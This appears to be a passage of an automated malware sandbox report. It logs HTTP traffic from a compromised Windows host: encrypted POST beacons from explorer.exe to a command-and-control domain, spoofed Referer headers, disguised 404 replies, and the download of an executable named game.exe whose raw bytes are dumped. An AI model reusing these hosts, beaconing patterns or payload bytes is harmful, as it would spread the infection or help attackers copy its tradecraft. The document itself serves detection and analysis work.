02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 5d e9 97 d4 54 e4 2f 62 20 ed 24 c6 2b c5 d4 d9 85 0a 8a 10 04 44 b9 97 8e fa be a8 0a 96 9e 9b 1b 1a f6 de 2e cf 9b 92 d1 62 69 05 cd 55 09 9f 78 bf 00 62 0f 65 fb 80 ef 5b 87 80 f5 cd bb 78 5a 64 a4 a4 7c 41 45 e8 41 ff 0e 4d a2 d0 97 23 77 5e 04 e8 66 9a 14 7a 81 93 17 7e 04 71 82 ba 73 96 7e bb b2 1f 38 33 a9 53 6f 27 c4 32 e7 ce 49 b9 9b 3b 08 31 d9 3d 2b 24 3c 78 a2 93 78 f9 3a 21 86 a5 ac 34
                                                                                                                          Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/arB`g1Q5ih.Kw:i/+".]pW!RYvqE>~lrv%?PS ;*qF=\@yv'X_`H1|;fKMw_G]u29gxuR6%O}oW0Jk"M2I?o|NM*`UY0;;W~5=@Vp%DZd!hV@qUf!vy'!B":C'GkKm@`#>[=Kx-,sq"J1Z"?+QzpJMQAdS9#(R#?p6E>C/CbG"UVFvc4Bp6HPgtPnj{T<c]f/YGO9We&gTzTO8^3%nG>"}h`1%W@N!{K.iwAg0!Wnawjg";kzR{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59]T/b $+D.biUxbe[xZd|AEAM#w^fz~qs~83So'2I;1=+$<xx:!4
                                                                                                                          Oct 29, 2021 17:06:52.215682983 CEST7304INData Raw: b8 63 1d 46 61 c6 62 0b 32 d3 60 97 71 08 b8 13 6f c4 bb 6e f3 be e1 ec 03 d0 e1 5a 06 42 f2 5e 9d 94 f2 5f 44 41 7d 56 06 8c 36 3e 9f 6d b9 e2 cb 35 37 0e a4 36 11 14 3d 76 c3 b8 dc c8 81 00 72 5d 57 96 38 e9 da c6 57 57 f4 e8 88 38 ec 33 b6 55
                                                                                                                          Data Ascii: cFab2`qonZB^_DA}V6>m576=vr]W8WW83UUeD3<2dW7j_)uXTT.GSuPK#wJ_fB=U@>Fg:szg\SD[.(%u!= 2&T>SPw,H?03/fH/
                                                                                                                          Oct 29, 2021 17:06:52.215699911 CEST7305INData Raw: 67 72 b1 90 37 d6 13 88 ef 8c be a4 fb 39 cf d0 c5 a4 60 cb 77 7b f2 3e a6 59 54 7c ba b7 d6 a0 09 a8 71 94 23 5a 15 5f 09 c9 8d dc f4 27 78 b8 d8 7c 79 9e 0d fa 23 2f 91 ec 0f ee ec 9e fa 77 d2 62 a2 2a 05 ac c2 cd f2 a8 e1 13 d0 6c f3 c2 84 98
                                                                                                                          Data Ascii: gr79`w{>YT|q#Z_'x|y#/wb*ls5pL4Yx}7n3p[C6Nfq[-*5d2Bb9!_OR>rW(ZDsI_k':7|1gz@r7:RGSe=S
                                                                                                                          Oct 29, 2021 17:06:52.215718031 CEST7306INData Raw: fb da 86 3c fe 86 33 07 36 99 38 83 5f 9b 99 8d 5a e3 13 40 85 85 52 4b 44 80 0e ce a3 a7 e5 09 e9 10 d6 b8 f6 fc 01 17 c0 b2 b9 fd 4a 6c da 88 19 20 63 9e 38 a6 34 69 db 7a d4 6a ff 1c 8f da f3 f1 44 6f 28 04 02 78 e2 dd ea 2b 98 b4 ae 8d 4b 47
                                                                                                                          Data Ascii: <368_Z@RKDJl c84izjDo(x+KGR8v!8I(l-W*0:FASp%P^T{-@8l.{V#RPFWm*h:!v #x(.1Id,ybw7Y|dR( !M
                                                                                                                          Oct 29, 2021 17:06:52.215733051 CEST7308INData Raw: e6 66 32 73 2b 6e 79 51 27 2f fc 47 c8 77 01 13 8c f7 7d ee f5 7b 8c dd fb 48 59 78 c6 87 39 3c aa b5 b9 29 fd 31 90 d5 ae a9 be a2 67 40 30 94 df 8b 6e 68 61 bf 40 d9 18 e5 0b 21 be 16 f9 3e 65 b2 b3 07 0a 7e 6d 7b c2 52 2d 0e b4 0c b9 ec 54 92
                                                                                                                          Data Ascii: f2s+nyQ'/Gw}{HYx9<)1g@0nha@!>e~m{R-Td+6uX~G`#Q>F{`~?jCx5/Xb62#OQQ*$9,~f-pJwu?Z]L2>*:$M ??qq Py2g7G #}I<{(,vxf&^;
                                                                                                                          Oct 29, 2021 17:06:52.215749025 CEST7309INData Raw: 68 18 ed 37 91 e3 fe 02 a7 89 f6 52 e0 09 d2 57 9c fe 3c fa e4 ce 8d b9 5e 3f dc 5f f4 4e c2 f5 b6 c6 3e 29 67 27 f8 22 c5 3a 48 d8 13 cf 85 d6 10 a7 9b 49 2c 8e 79 63 aa 10 2e 3c 00 c3 ae 00 cc ec cf 09 d1 f9 b0 7a be db f9 6b 18 29 ef bb ee 40
                                                                                                                          Data Ascii: h7RW<^?_N>)g'":HI,yc.<zk)@WxfKXg,J.IQ9c4Z/tB,+ ;Q,Tv<l'v$9gSdN3Xl'Ps6r 5uIs 6b7v0mK<lBYW2V<Rkp`k?NIs^
                                                                                                                          Oct 29, 2021 17:06:52.215764999 CEST7310INData Raw: aa 61 64 ff f3 91 0b a5 79 29 a3 99 55 bb f2 9a 0b 9a 17 6f 52 1e e0 dd 01 30 1c 16 52 95 d9 45 2d a0 d2 26 d1 12 35 4c ca d4 5f a7 94 61 a7 1c c5 32 1f cb c4 47 99 6a 36 e7 9c 7a da e0 ae 2c 3d 2e 5c 42 a8 b7 69 de 55 80 25 2b 69 4a a7 ec 39 2b
                                                                                                                          Data Ascii: ady)UoR0RE-&5L_a2Gj6z,=.\BiU%+iJ9+Lk_;A17bn/=RvZa7[g2TX@8a:ixvb?}v< !2000>I*HrRF'OMVKW)%~ T
                                                                                                                          Oct 29, 2021 17:06:52.215780973 CEST7312INData Raw: 29 19 0c 43 c6 09 90 4e 54 25 12 e8 fc fa 7d bb bd 28 2a d3 9a 6d 51 04 92 ab 89 71 88 0b 6e 69 79 1c 68 92 4d 35 9f 44 c5 ba 2e 93 4a 92 f6 c8 0c e4 16 43 ae ed a0 68 b7 87 71 0f 58 fc ed ef 83 7e ab bf e1 f5 1b e1 8b ff 67 d3 44 7a a4 35 06 f0
                                                                                                                          Data Ascii: )CNT%}(*mQqniyhM5D.JChqX~gDz5)ky:W!w)`d'=%yp@(c67;IA.77d/b. pnB9XT/{V*C2+"cLPt'/U+aqQ
                                                                                                                          Oct 29, 2021 17:06:52.215796947 CEST7313INData Raw: e9 a0 72 9a 35 0b 6e 5b cc d3 a8 3d 65 f9 c7 bc 2b 6c 26 f2 9d cd 87 84 ef 5b d5 e9 2c c7 d7 50 a6 88 12 2f ae fb e1 e1 e9 00 98 d9 1a 01 18 fa fb e8 ff 2a 34 3b 6c 1c 92 ac c4 2a ad b0 20 89 c7 db b5 1e 53 8d 86 6e 69 22 cc 36 76 f2 5b 72 a8 66
                                                                                                                          Data Ascii: r5n[=e+l&[,P/*4;l* Sni"6v[rfOKNn`B$_>&#8-'XN>ifj5SYGv2Q%l4lb3OVpLJQo2/F0qx+]#26'H
                                                                                                                          Oct 29, 2021 17:06:52.215812922 CEST7315INData Raw: d5 cd 3c ba d0 a9 4b 5f 63 85 46 8a dd 97 ab e4 d6 12 e7 3e 27 a3 83 2c e0 ed ae a4 17 2f 10 44 a4 99 0b bb 78 de 31 cb a0 07 8f f0 80 ae af a3 cb df d3 36 52 3e 3d 50 74 8a 2d d0 7f 56 ba 4a 04 02 46 a5 b2 f5 d0 84 1e da eb f9 b6 1d fe e7 68 00
                                                                                                                          Data Ascii: <K_cF>',/Dx16R>=Pt-VJFhxHY963L!NIk63s"tD(A.ZYQKzjr+[|J>P!=P;%;UK?Pp2Cd!Hmon^DK
                                                                                                                          Oct 29, 2021 17:06:52.268069983 CEST7316INData Raw: b1 7a c7 a7 68 41 76 82 32 19 87 0a 4a ea 52 d0 30 9a 09 c9 2b b7 ea 3f 46 c4 aa b1 f8 f0 c6 68 21 01 37 a3 0c bc 72 79 45 d2 81 dc 29 07 18 9a 23 e3 cc 52 31 d5 d6 e0 21 ad 93 f9 bc b0 6d b5 31 42 ca 23 a5 25 0a f6 e3 88 26 0f 81 c0 08 b0 64 35
                                                                                                                          Data Ascii: zhAv2JR0+?Fh!7ryE)#R1!m1B#%&d5eI=HS5[,$,61^=xEy=xT;5<bK.%tZXPvk~,=Z@c&Uv$a55a)o6TfqFg2Bb#>(`YIK


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          34192.168.2.749827185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:56.955110073 CEST7663OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://tejnpx.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 356
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:56.955132961 CEST7664OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 8a 66 5d 02 c9 a1 c1 64 44 9d a3 79
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dDyhL3f~psi#-cQv.{(1zIQq0~NCo?)W2}O"ToLoPaUsc*5BJQG N\4yKSUiUMft@9
                                                                                                                          Oct 29, 2021 17:06:57.031225920 CEST7664INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:57 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          35192.168.2.749828185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:57.146878004 CEST7665OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://fkxqdusmf.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 255
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:57.146898031 CEST7665OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 8b 66 5d 02 c8 a1 c1 64 3d b6 b2 7b
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d={6u1t{,U_D|}zZKZN)2}x3p^9"kPYl,Nh#a9!lb}&WUQ__b~dR0PuAtW
                                                                                                                          Oct 29, 2021 17:06:57.224498034 CEST7666INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:57 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 29I:82OUcScS0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          36192.168.2.749829185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:57.806314945 CEST7666OUTGET /game.exe HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Host: sysaheu90.top
                                                                                                                          Oct 29, 2021 17:06:57.947045088 CEST7668INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:57 GMT
                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                          Last-Modified: Fri, 29 Oct 2021 15:06:02 GMT
                                                                                                                          ETag: "93400-5cf7f2a60acf0"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 603136
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 34 de 0b c3 70 bf 65 90 70 bf 65 90 70 bf 65 90 1f c9 ce 90 5c bf 65 90 1f c9 fb 90 52 bf 65 90 1f c9 cf 90 f0 bf 65 90 79 c7 f6 90 77 bf 65 90 70 bf 64 90 0f bf 65 90 1f c9 ca 90 71 bf 65 90 1f c9 ff 90 71 bf 65 90 1f c9 f8 90 71 bf 65 90 52 69 63 68 70 bf 65 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e4 35 db 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 b2 07 00 00 c4 70 02 00 00 00 00 10 b1 05 00 00 10 00 00 00 d0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 78 02 00 04 00 00 1e e7 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 b5 07 00 50 00 00 00 00 50 77 02 68 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 02 8c 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 a5 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 b0 07 00 00 10 00 00 00 b2 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 d0 07 00 00 16 00 00 00 b6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 6d 69 64 00 00 e5 02 00 00 00 40 77 02 00 04 00 00 00 cc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 3f 00 00 00 50 77 02 00 40 00 00 00 d0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 cc 23 01 00 00 90 77 02 00 24 01 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$4pepepe\eReeywepdeqeqeqeRichpePEL5^p@xPPwh?w0@.text `.dataio@.bumid@w@.rsrch?Pw@@@.reloc#w$@B
                                                                                                                          Oct 29, 2021 17:06:57.947071075 CEST7669INData Raw: b0 b7 07 00 cc b7 07 00 da b7 07 00 e6 b7 07 00 f2 b7 07 00 0a b8 07 00 28 b8 07 00 42 b8 07 00 54 b8 07 00 70 b8 07 00 88 b8 07 00 96 b8 07 00 aa b8 07 00 b8 b8 07 00 d2 b8 07 00 e6 b8 07 00 f6 b8 07 00 12 b9 07 00 22 b9 07 00 34 b9 07 00 4c b9
                                                                                                                          Data Ascii: (BTp"4L`t&6JZl(@Tt"0
                                                                                                                          Oct 29, 2021 17:06:57.947082996 CEST7671INData Raw: 22 00 2c 00 20 00 30 00 29 00 00 00 00 00 72 00 61 00 69 00 73 00 65 00 00 00 72 00 75 00 6e 00 74 00 69 00 6d 00 65 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 00 00 00 00 0d 00 0a 00 00 00 00 00 54 00 4c 00 4f 00 53 00 53 00 20 00 65 00 72 00
                                                                                                                          Data Ascii: ", 0)raiseruntime error TLOSS errorSING errorDOMAIN errorR6033- Attempt to use MSIL code from this
                                                                                                                          Oct 29, 2021 17:06:57.947098970 CEST7672INData Raw: 0a 00 2d 00 20 00 70 00 75 00 72 00 65 00 20 00 76 00 69 00 72 00 74 00 75 00 61 00 6c 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 63 00 61 00 6c 00 6c 00 0d 00 0a 00 00 00 00 00 00 00 52 00 36 00 30 00 32 00 34 00 0d 00 0a 00
                                                                                                                          Data Ascii: - pure virtual function callR6024- not enough space for _onexit/atexit tableR6019- unable to open console
                                                                                                                          Oct 29, 2021 17:06:57.947113037 CEST7673INData Raw: 73 00 69 00 7a 00 65 00 6f 00 66 00 28 00 6f 00 75 00 74 00 6d 00 73 00 67 00 5b 00 30 00 5d 00 29 00 29 00 2c 00 20 00 4c 00 22 00 5c 00 6e 00 5c 00 6e 00 22 00 29 00 00 00 2e 00 2e 00 2e 00 00 00 77 00 63 00 73 00 6e 00 63 00 70 00 79 00 5f 00
                                                                                                                          Data Ascii: sizeof(outmsg[0])), L"\n\n")...wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)<program name unknown>wcscp
                                                                                                                          Oct 29, 2021 17:06:57.947130919 CEST7675INData Raw: 00 00 00 00 00 ac eb 3f 00 00 00 00 00 4e eb 3f 00 00 00 00 00 4e eb 3f 00 00 00 00 00 f2 ea 3f 00 00 00 00 00 f2 ea 3f 00 00 00 00 00 98 ea 3f 00 00 00 00 00 98 ea 3f 00 00 00 00 00 42 ea 3f 00 00 00 00 00 42 ea 3f 00 00 00 00 00 ec e9 3f 00 00
                                                                                                                          Data Ascii: ?N?N?????B?B?????H?H?????b?b???????F?F??
                                                                                                                          Oct 29, 2021 17:06:57.947148085 CEST7676INData Raw: a4 3f 88 e9 d7 3f 89 f2 43 67 f9 af 3f 3d 00 30 89 8a d3 98 d8 3f 57 2f 1e 07 66 f6 31 3d 00 60 03 28 04 4a d9 3f 44 6b 8c b0 bc e7 30 3d 00 68 bf f4 23 f1 d9 3f 1f 40 f2 15 20 89 36 3d 00 80 db ab fc 99 da 3f 11 a3 87 5f 9c e8 11 3d 00 88 14 7c
                                                                                                                          Data Ascii: ??Cg?=0?W/f1=`(J?Dk0=h#?@ 6=?_=|D?&?4j<='?Qn&=?l=6?DX,4=?-Q2=xbt?WE<.l?7w,=?l>=%?Nl,"=@\r??t8=85R
                                                                                                                          Oct 29, 2021 17:06:57.947163105 CEST7677INData Raw: 58 68 b7 3f 2c e4 6e 40 34 60 ed 3c 00 b0 e6 24 9e a8 b7 3f db d1 1c ef f1 05 e7 3c 00 b6 6e 1c e5 e8 b7 3f fe 94 39 f0 dc ae df 3c 00 ad 00 97 2d 29 b8 3f 07 5c aa 9d bb bf c4 3c 00 d6 c5 98 77 69 b8 3f e0 a1 e9 e5 11 3d ef 3c 00 52 e8 25 c3 a9
                                                                                                                          Data Ascii: Xh?,n@4`<$?<n?9<-)?\<wi?=<R%?f@<*B?aw<G^*?m(<<2;j?PE<?</<:T?Ft<+?NibzP<l? %X<aY?]@_}<nL?G<1-
                                                                                                                          Oct 29, 2021 17:06:57.947180033 CEST7679INData Raw: e3 3c 00 40 cc 93 d9 9c cc 3f 1a ad c8 1c ee 45 ea 3c 00 56 4f 75 7f de cc 3f 21 53 97 c3 80 58 f4 3c 00 0f 62 11 2d 20 cd 3f 43 b2 3a 92 07 e1 f6 3c 00 c0 10 7c e2 61 cd 3f 42 ae 3c af b0 24 fb 3c 00 e7 7b c9 9f a3 cd 3f 2b 58 ea a9 55 47 e9 3c
                                                                                                                          Data Ascii: <@?E<VOu?!SX<b- ?C:<|a?B<$<{?+XUG<me?>U<o]2'?I<i?G<o? n<9[?|^<.?>oj<._p?1S<X?l<~?o.x<%3d?{=
                                                                                                                          Oct 29, 2021 17:06:57.947196960 CEST7680INData Raw: 8d 1e 0a c9 f0 52 00 3d 00 6c 5b e0 f2 5d e2 3f 1e cc 24 c5 9c 69 10 3d 00 77 2f b3 64 aa e2 3f be f8 1d b8 43 83 1b 3d 00 9a 28 c9 4f f7 e2 3f 75 82 bc 31 e4 dd 1b 3d 00 9a 85 2f b8 44 e3 3f 05 12 20 ba 19 26 1d 3d 00 b7 87 20 a2 92 e3 3f 69 fe
                                                                                                                          Data Ascii: R=l[]?$i=w/d?C=(O?u1=/D? &= ?iC1]<Ei?X=g<P~0?Y;= ]?m<?A8y<7l ?S6==.q?+`=?%!5=oh?y=iQi?v7=?dDR
                                                                                                                          Oct 29, 2021 17:06:57.999188900 CEST7682INData Raw: e9 87 8c 97 ef 3f 56 9f b4 f3 f3 94 ef 3f 08 25 11 0d 53 92 ef 3f 56 a9 ea d1 a9 8f ef 3f df 96 25 40 f8 8c ef 3f 08 04 9f 55 3e 8a ef 3f 32 aa 2c 10 7c 87 ef 3f d0 dc 9c 6d b1 84 ef 3f 56 80 b6 6b de 81 ef 3f 06 01 39 08 03 7f ef 3f 98 49 dc 40
                                                                                                                          Data Ascii: ?V?%S?V?%@?U>?2,|?m?Vk?9?I@|?P3y??}>v?H|As?#<p?_0.m?tj?f?c?3)`?i]?F)Z?2VV?f\S?B?}4P?VL?{fI?uSE?|uB?1<>?(b


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          37192.168.2.749833185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:07:01.508173943 CEST10365OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://plwck.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 299
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:07:01.508183956 CEST10366OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 8b 66 5d 02 c9 a1 c1 64 22 b7 be 10
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d"1A9X"MIx(D!TGI?=|`z#1fBDCm\k7K"" iu8&E{1jk0ItPb8_pUy[hZ:dSR/
                                                                                                                          Oct 29, 2021 17:07:01.590074062 CEST10368INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:01 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
